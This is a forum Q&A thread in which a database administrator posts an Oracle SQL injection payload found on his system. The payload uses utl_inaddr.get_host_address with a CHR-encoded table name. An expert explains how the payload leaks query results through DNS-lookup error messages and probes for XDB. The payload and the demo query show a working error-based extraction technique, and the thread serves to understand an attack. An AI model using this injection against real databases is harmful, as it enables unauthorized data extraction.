Go Premium for a chance to win a PS4. Enter to Win

x
?
Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
7
Medium Priority
?
1,871 Views
Last Modified: 2014-01-15
found that someone use sql injection to run this sql in my oracle database via web application. I don't get his purpose. why use utl_inaddr.get_host_address and number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual

Open in new window

0
Comment
Question by:Hoboly
  • 4
  • 3
7 Comments
 
LVL 74

Assisted Solution

by:sdstuber
sdstuber earned 2000 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address  is a quirk of the error message returned by the function.  If the host name passed in produces an error, that "name" will be returned as part of the error

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Open in new window


So, by nesting a query inside the function call , the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error.  Then that illegal text will be returned as part of the error message
0
 

Author Comment

by:Hoboly
ID: 39784470
no XS$DELETE
but these is a table XS$CACHE_DELETE

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

should be standard oracle 11g table
0
 

Author Comment

by:Hoboly
ID: 39784471
thanks Sdstuber
but I don't get it why COUNT (column_name)  into utl_inaddr.get_host_address.
if he wants to get the ip, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count)
0
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

 
LVL 74

Accepted Solution

by:
sdstuber earned 2000 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will be vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but it's mere existence would tell the hacker that XDB has been installed and that knowledge can provide a new attack vector.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query,  the error message part probably isn't going to happen.  Sorry for the confusion

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e XDB is installed


Using the same technique though,  you can execute other queries and check the error messages to see what the results of those queries will be
0
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!
0

Featured Post

What is SQL Server and how does it work?

The purpose of this paper is to provide you background on SQL Server. It’s your self-study guide for learning fundamentals. It includes both the history of SQL and its technical basics. Concepts and definitions will form the solid foundation of your future DBA expertise.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This post first appeared at Oracleinaction  (http://oracleinaction.com/undo-and-redo-in-oracle/)by Anju Garg (Myself). I  will demonstrate that undo for DML’s is stored both in undo tablespace and online redo logs. Then, we will analyze the reaso…
Using SQL Scripts we can save all the SQL queries as files that we use very frequently on our database later point of time. This is one of the feature present under SQL Workshop in Oracle Application Express.
This video shows how to set up a shell script to accept a positional parameter when called, pass that to a SQL script, accept the output from the statement back and then manipulate it in the Shell.
Wufoo.com provides powerful tools for surveying targeted groups, and utilizing data from completed surveys to find trends, discover areas of demand or customer expectation, and make business decisions on products or services.
Suggested Courses

963 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question